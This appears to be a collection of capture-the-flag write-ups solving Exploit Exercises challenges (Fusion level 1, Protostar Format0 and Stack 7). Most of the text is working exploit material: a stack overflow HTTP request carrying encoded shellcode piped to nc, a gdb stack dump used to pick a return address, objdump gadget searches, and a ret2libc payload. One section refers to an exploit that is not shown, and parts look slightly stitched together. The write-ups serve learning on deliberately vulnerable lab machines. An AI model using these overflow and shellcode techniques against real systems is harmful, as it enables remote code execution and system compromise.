python -c ‘print “GET ” + “/home/fusion/” + “A”*127 + “BBBB” + ” HTTP/1.1\r\n” + “C”*155’ | nc 20000

(gdb) x/100x 0xbffff32c
0xbffff32c: 0x42424242 0xbffff300 0x00000020 0x00000004
0xbffff33c: 0x001761e4 0x001761e4 0x000027d8 0x20544547
0xbffff34c: 0x6d6f682f 0x75662f65 0x6e6f6973 0x4141412f
0xbffff35c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff36c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff37c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff38c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff39c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff3ac: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff3bc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff3cc: 0x41414141 0x41414141 0x41414141 0x42424242
0xbffff3dc: 0x54544800 0x2e312f50 0x430a0d31 0x43434343
0xbffff3ec: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff3fc: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff40c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff41c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff42c: 0x43434343 0x43434343 0x43434343 0x43434343

Reminder: I knew to place the Cs after the HTTP statement because of the hint. So we should be able to use a return address of 0xbffff3ec. Now we try exploitation:

fusion@fusion:~$ python -c ‘print “GET ” + “/home/fusion/” + “A”*127 + “\xec\xf3\xff\xbf” + ” HTTP/1.1\r\n” + “\x59\x53\x4f\x42\x59\x1e\x51\x5d\x0e\x60\x1e\x47\x5d\x90\x46\x92\x57\x56\x91\x47\x60\x4f\x98\x48\x5f\xd6\x5f\x48\x46\x91\x49\x58\x06\x4f\x5b\x5e\x9f\x51\x5e\x5b\x60\x4d\x93\x41\x5f\xfd\x55\xfc\x55\xfc\xdb\xca\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1\x14\xbf\x05\x58\xc6\x87\x31\x7d\x19\x03\x7d\x19\x83\xed\xfc\xe7\xad\xf7\x5c\x10\xae\xab\x21\x8d\x5b\x4e\x2f\xd0\x2c\x28\xe2\x92\x16\xeb\xae\xfa\xaa\x13\x5e\xa6\xc0\x03\x31\x06\x9c\xc5\xdb\xc0\xc6\xc8\x9c\x85\xb6\xd6\x2f\x91\x88\xb1\x82\x19\xab\x8d\x7b\xd4\xac\x7d\xda\x8c\x93\xd9\x10\xd0\xa5\xa0\x52\xb8\x1a\x7c\xd0\x50\x0d\xad\x74\xc9\xa3\x38\x9b\x59\x6f\xb2\xbd\xe9\x84\x09\xbd”‘ | nc 20000

Sure enough that works!


Protostar Exploit Challenges Format0 Solution


Format0 is the introduction to the string exploitation levels. There isn’t much to it except a bit of minutia in the printf function.


We must complete this level in under 10 bytes of input, which means we can’t do our typical print 1 billion As deal. What we instead do is use the width specifier of %s. We can do something like %64s to say we want a string of width 64, which sprintf will then print.

So our exploit simply looks like the following:


Protostar Exploit Challenges Stack 7 Solution


This challenge is nearly identical to the last except that you must find a random ret to use and then jump to system.


Using the same tactics as before I determined the address of my environment variable was at 0xbffffe63.

Now we need is a gadget containing a RET. There are fancier, more sophisticated ways to do this, but I’m just going to use objdump.

objdump -D stack7 | grep -E ‘pop\s*%e[a-d]x’ -A5 | grep ret -B1
8048382: c9 leave
8048383: c3 ret

8048493: 5d pop %ebp
8048494: c3 ret

80485c8: 5d pop %ebp
80485c9: c3 ret

80485f8: 5d pop %ebp
80485f9: c3 ret

8048616: c9 leave
8048617: c3 ret

As it happens there are a few! I decided to go with the one at 0x08048383.

python -c ‘print “A”*80 + “\x83\x83\x04\x08” + “\xb0\xff\xec\xb7” + “A”*4 + “\x6c\xfe\xff\xbf”‘

And that works just fine!


It prints the word NONSENSE as expected.